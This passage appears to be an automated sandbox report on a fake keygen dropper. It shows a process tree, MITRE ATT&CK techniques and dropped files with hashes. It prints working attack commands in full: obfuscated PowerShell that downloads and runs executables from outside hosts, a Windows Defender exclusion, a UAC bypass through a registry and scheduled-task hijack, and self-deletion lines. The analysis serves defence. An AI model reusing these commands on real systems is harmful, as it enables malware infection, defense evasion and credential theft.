                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:2332
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2052
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:1684
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 1684 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\809512687014815\\* & exit
                      9⤵
                        PID:2396
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 1684
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1944
                • C:\Users\Public\izw.exe
                  "C:\Users\Public\izw.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1788
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6345.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1976
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2028
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:1996
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6345.tmp\ba.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1128
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1408
              • C:\Users\Public\kvh.exe
                "C:\Users\Public\kvh.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2580
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2704
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2884
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2884 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\663487901885366\\* & exit
                      8⤵
                        PID:2980
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2884
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2116
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2748
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2900
                  • C:\Users\Public\kvh.exe
                    "C:\Users\Public\kvh.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops desktop.ini file(s)
                    • Modifies system certificate store
                    PID:2828
                    • C:\Users\Admin\AppData\Local\Temp\mCMtzwlIvi.exe
                      "C:\Users\Admin\AppData\Local\Temp\mCMtzwlIvi.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1760
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                        "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\mCMtzwlIvi.exe"'
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2292
                    • C:\Users\Admin\AppData\Local\Temp\tWaFwUtdW6.exe
                      "C:\Users\Admin\AppData\Local\Temp\tWaFwUtdW6.exe"
                      7⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:1376
                      • C:\Windows\SysWOW64\Notepad.exe
                        "C:\Windows\System32\Notepad.exe"
                        8⤵
                          PID:2968
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c C:\Users\Public\Natso.bat
                            9⤵
                              PID:1964
                              • C:\Windows\SysWOW64\reg.exe
                                reg delete hkcu\Environment /v windir /f
                                10⤵
                                • Modifies registry key
                                PID:2472
                              • C:\Windows\SysWOW64\reg.exe
                                reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                                10⤵
                                • Modifies registry key
                                PID:1816
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                                10⤵
                                  PID:2616
                            • C:\Program Files (x86)\internet explorer\ieinstal.exe
                              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                              8⤵
                                PID:852
                            • C:\Users\Admin\AppData\Local\Temp\P8wrKM2b4l.exe
                              "C:\Users\Admin\AppData\Local\Temp\P8wrKM2b4l.exe"
                              7⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of SetWindowsHookEx
                              PID:2212
                              • \??\c:\windows\SysWOW64\cmstp.exe
                                "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\kj2dyxxx.inf
                                8⤵
                                  PID:548
                              • C:\Users\Admin\AppData\Local\Temp\FdoC68Kd7f.exe
                                "C:\Users\Admin\AppData\Local\Temp\FdoC68Kd7f.exe"
                                7⤵
                                • Executes dropped EXE
                                • Windows security modification
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2604
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell" Get-MpPreference -verbose
                                  8⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1392
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\kvh.exe"
                                7⤵
                                  PID:2624
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /T 10 /NOBREAK
                                    8⤵
                                    • Delays execution with timeout.exe
                                    PID:792
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6345.tmp\ba1.hta"
                          3⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of WriteProcessMemory
                          PID:964
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1464

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    Modify Existing Service

                    1
                    T1031

                    Registry Run Keys / Startup Folder

                    1
                    T1060

                    Defense Evasion

                    Modify Registry

                    6
                    T1112

                    Disabling Security Tools

                    2
                    T1089

                    Install Root Certificate

                    1
                    T1130

                    Credential Access

                    Credentials in Files

                    3
                    T1081

                    Discovery

                    Query Registry

                    2
                    T1012

                    System Information Discovery

                    2
                    T1082

                    Collection

                    Data from Local System

                    3
                    T1005

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\ProgramData\MSVCP140.dll
                    • C:\ProgramData\VCRUNTIME140.dll
                    • C:\ProgramData\freebl3.dll
                    • C:\ProgramData\freebl3.dll
                    • C:\ProgramData\mozglue.dll
                    • C:\ProgramData\mozglue.dll
                    • C:\ProgramData\msvcp140.dll
                    • C:\ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • C:\ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • C:\ProgramData\softokn3.dll
                    • C:\ProgramData\softokn3.dll
                    • C:\ProgramData\sqlite3.dll
                    • C:\ProgramData\sqlite3.dll
                    • C:\ProgramData\vcruntime140.dll
                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ab2c564-9698-406f-80da-b82bfb15ab48
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38604b7f-3b56-4cdf-857e-df63e390b481
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a38e600-169e-4ec7-98bd-529788f42566
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_42778251-f07e-4ae1-bc57-a77894ebb1f5
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c3f706e-97a9-41e8-aca3-b206a4c6c3c2
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c80f677-3c28-410d-966a-1d329145fa84
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a5a18e70-0494-4407-89e6-7656347f4ad8
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a700e20d-ef30-47d4-abf6-6f8f1430f64a
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e2a5a1ab-dd0f-49d8-948d-822b9bd7caa5
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_effc8546-940d-4e7d-85e6-b45fb1d9b367
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6c022a0-3417-44e8-b1ce-b4f3058eea49
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                    • C:\Users\Admin\AppData\Local\Temp\6345.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\6345.tmp\Keygen.exe
                    • C:\Users\Admin\AppData\Local\Temp\6345.tmp\b.hta
                    • C:\Users\Admin\AppData\Local\Temp\6345.tmp\b1.hta
                    • C:\Users\Admin\AppData\Local\Temp\6345.tmp\ba.hta
                    • C:\Users\Admin\AppData\Local\Temp\6345.tmp\ba1.hta
                    • C:\Users\Admin\AppData\Local\Temp\6345.tmp\m.hta
                    • C:\Users\Admin\AppData\Local\Temp\6345.tmp\m1.hta
                    • C:\Users\Admin\AppData\Local\Temp\6345.tmp\start.bat
                    • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • C:\Users\Admin\AppData\Local\Temp\FdoC68Kd7f.exe
                    • C:\Users\Admin\AppData\Local\Temp\FdoC68Kd7f.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • C:\Users\Admin\AppData\Local\Temp\P8wrKM2b4l.exe
                    • C:\Users\Admin\AppData\Local\Temp\P8wrKM2b4l.exe
                    • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • C:\Users\Admin\AppData\Local\Temp\mCMtzwlIvi.exe
                    • C:\Users\Admin\AppData\Local\Temp\mCMtzwlIvi.exe
                    • C:\Users\Admin\AppData\Local\Temp\tWaFwUtdW6.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Admin\AppData\Local\Temp\tWaFwUtdW6.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                    • C:\Users\Public\Natso.bat
                    • C:\Users\Public\izw.exe
                    • C:\Users\Public\izw.exe
                    • C:\Users\Public\izw.exe
                    • C:\Users\Public\kvh.exe
                    • C:\Users\Public\kvh.exe
                    • C:\Users\Public\kvh.exe
                    • C:\Users\Public\ubl.exe
                    • C:\Users\Public\ubl.exe
                    • C:\Users\Public\ubl.exe
                    • C:\Windows\temp\kj2dyxxx.inf
                    • \??\PIPE\lsarpc
                    • \??\PIPE\srvsvc
                    • \??\PIPE\srvsvc
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\mozglue.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\msvcp140.dll
                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\nss3.dll
                      MD5

                      bfac4e3c5908856ba17d41edcd455a51

                      SHA1

                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                      SHA256

                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                      SHA512

                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \ProgramData\sqlite3.dll
                    • \ProgramData\vcruntime140.dll
                    • \ProgramData\vcruntime140.dll
                    • \ProgramData\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                      MD5

                      02cc7b8ee30056d5912de54f1bdfc219

                      SHA1

                      a6923da95705fb81e368ae48f93d28522ef552fb

                      SHA256

                      1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                      SHA512

                      0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                    • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                    • \Users\Admin\AppData\LocalLow\sqlite3.dll
                    • \Users\Admin\AppData\Local\Temp\6345.tmp\Keygen.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    • \Users\Admin\AppData\Local\Temp\FdoC68Kd7f.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    • \Users\Admin\AppData\Local\Temp\P8wrKM2b4l.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    • \Users\Admin\AppData\Local\Temp\mCMtzwlIvi.exe
                    • \Users\Admin\AppData\Local\Temp\tWaFwUtdW6.exe
                      MD5

                      013db621a3351e3fb049efd2ccad79ff

                      SHA1

                      a23394ea54dbc5342a77938a2c285ee616185560

                      SHA256

                      df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                      SHA512

                      1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                    • \Users\Public\izw.exe
                    • \Users\Public\kvh.exe
                    • \Users\Public\kvh.exe
                    • \Users\Public\ubl.exe
                    • \Users\Public\ubl.exe
                    • memory/548-352-0x0000000000000000-mapping.dmp
                    • memory/792-343-0x0000000000000000-mapping.dmp
                    • memory/852-627-0x0000000000090000-0x0000000000091000-memory.dmp
                      Filesize

                      4KB

